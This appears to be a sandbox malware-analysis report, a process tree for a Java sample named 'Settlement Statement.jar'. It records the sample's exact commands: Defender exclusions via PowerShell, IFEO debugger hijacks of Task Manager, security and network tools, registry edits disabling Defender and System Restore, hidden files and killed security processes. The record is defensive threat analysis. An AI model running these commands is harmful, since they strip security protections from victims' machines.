PID 4588 wrote to memory of 4688	4588	cmd.exe	348
PID 3816 wrote to memory of 4708	3816	java.exe	349
PID 3816 wrote to memory of 4708	3816	java.exe	349
PID 4708 wrote to memory of 4784	4708	cmd.exe	351
PID 4708 wrote to memory of 4784	4708	cmd.exe	351
PID 4708 wrote to memory of 4776	4708	cmd.exe	352
PID 4708 wrote to memory of 4776	4708	cmd.exe	352
PID 3816 wrote to memory of 4800	3816	java.exe	353
PID 3816 wrote to memory of 4800	3816	java.exe	353
PID 4800 wrote to memory of 4860	4800	cmd.exe	355
PID 4800 wrote to memory of 4860	4800	cmd.exe	355
PID 4800 wrote to memory of 4864	4800	cmd.exe	356
PID 4800 wrote to memory of 4864	4800	cmd.exe	356
PID 3816 wrote to memory of 4892	3816	java.exe	357
PID 3816 wrote to memory of 4892	3816	java.exe	357
PID 4892 wrote to memory of 4988	4892	cmd.exe	359
PID 4892 wrote to memory of 4988	4892	cmd.exe	359
PID 4892 wrote to memory of 4980	4892	cmd.exe	360
PID 4892 wrote to memory of 4980	4892	cmd.exe	360
PID 3816 wrote to memory of 5028	3816	java.exe	361
PID 3816 wrote to memory of 5028	3816	java.exe	361
PID 5028 wrote to memory of 5092	5028	cmd.exe	363
PID 5028 wrote to memory of 5092	5028	cmd.exe	363
PID 5028 wrote to memory of 1656	5028	cmd.exe	364
PID 5028 wrote to memory of 1656	5028	cmd.exe	364
PID 3816 wrote to memory of 1156	3816	java.exe	365
PID 3816 wrote to memory of 1156	3816	java.exe	365
PID 1156 wrote to memory of 2296	1156	cmd.exe	367
PID 1156 wrote to memory of 2296	1156	cmd.exe	367
PID 1156 wrote to memory of 3428	1156	cmd.exe	368
PID 1156 wrote to memory of 3428	1156	cmd.exe	368
PID 3816 wrote to memory of 1548	3816	java.exe	369
PID 3816 wrote to memory of 1548	3816	java.exe	369
PID 1548 wrote to memory of 3860	1548	cmd.exe	371
PID 1548 wrote to memory of 3860	1548	cmd.exe	371
PID 1548 wrote to memory of 1340	1548	cmd.exe	372
PID 1548 wrote to memory of 1340	1548	cmd.exe	372
PID 3816 wrote to memory of 3728	3816	java.exe	373
PID 3816 wrote to memory of 3728	3816	java.exe	373
PID 3816 wrote to memory of 500	3816	java.exe	375
PID 3816 wrote to memory of 500	3816	java.exe	375
PID 3816 wrote to memory of 2804	3816	java.exe	377
PID 3816 wrote to memory of 2804	3816	java.exe	377
PID 3816 wrote to memory of 2492	3816	java.exe	379
PID 3816 wrote to memory of 2492	3816	java.exe	379
PID 3816 wrote to memory of 2112	3816	java.exe	381
PID 3816 wrote to memory of 2112	3816	java.exe	381
PID 3816 wrote to memory of 4264	3816	java.exe	383
PID 3816 wrote to memory of 4264	3816	java.exe	383
PID 3816 wrote to memory of 4384	3816	java.exe	385
PID 3816 wrote to memory of 4384	3816	java.exe	385
PID 3816 wrote to memory of 4548	3816	java.exe	387
PID 3816 wrote to memory of 4548	3816	java.exe	387
PID 3816 wrote to memory of 4696	3816	java.exe	389
PID 3816 wrote to memory of 4696	3816	java.exe	389

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
640	attrib.exe
684	attrib.exe
2208	attrib.exe
2496	attrib.exe
2492	attrib.exe
3552	attrib.exe
3804	attrib.exe
500	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Settlement Statement.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:684
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:2208
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2496
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2492
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:3552
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:3804
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\hmJMe
  2⤵
  - Views/modifies file attributes
  PID:500
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
  2⤵
  - Views/modifies file attributes
  PID:640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1900
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:2404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2556
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1264
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3328
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3320
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:3008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:64
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:748
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3368
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1088
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:3160
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1344
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:3432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:660
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2812
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1564
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2764
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2584
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2876
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:900
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1308
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:2812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3108
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3164
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2164
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1248
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:3776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:984
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:3328
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3428
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2316
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1268
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:3572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:8
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:2804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1124
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:8
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:8
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:3696
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:64
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:2644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:3884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:3544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:3844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4140
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4396
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4476
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4552
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4872
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4920
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4980
- - C:\Windows\system32\reg.exe
